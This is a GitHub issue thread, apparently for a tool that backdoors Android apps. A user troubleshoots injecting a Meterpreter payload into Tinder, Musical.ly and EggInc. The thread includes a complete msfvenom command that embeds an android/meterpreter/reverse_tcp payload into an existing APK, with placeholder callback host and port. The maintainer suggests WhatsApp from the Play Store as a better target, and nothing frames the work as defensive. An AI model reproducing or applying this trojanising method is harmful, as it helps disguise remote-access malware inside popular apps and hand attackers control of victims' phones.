Closed xXDUNNKILLED1Xx closed 7 years ago
@xXDUNNKILLED1Xx Please attach the original APK file.
I will try a different one real quick but it will not let me upload it because the file size is over 10mb, but here is the link to the one i used:
Edit*** just tried with the tinder apk, it fails to re-compile the original apk with the backdoor I appreciate you being so quick to help too btw! wish I wasn't causing so much trouble
Edit x2***** I've tried to run this with Musical.ly, Tinder, and EggInc. Musically acts like it kills the job, as soon as it is ran it starts a session, the that session dies and the job is no longer open, Tinder fails to rebuild and egginc cant find a hook point. I also ran it in msfvenom format "msfvenom -x "Which ever apk i tried" -k -p android/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=X.X.X.X -o Test.apk" and it gave me the exact same results as your code did so this may be a metasploit error? I'm trying to help debug as much as i can.
@xXDUNNKILLED1Xx There are known issues and limitations of Apktool. See #78 for a common issue encountered by users of this project. Also, try some APKs directly from the Google Play store or directly from the developer. For example, the latest version of WhatsApp.
APKs obtained from outside the Google Play store can have quality problems.
Thank you, I'll close it since it's nothing wrong with your code but apktool and maybe the apks I have.
As soon as i open my infected apk file, i get a meterpreter session but it instantly closes for "Reason :died"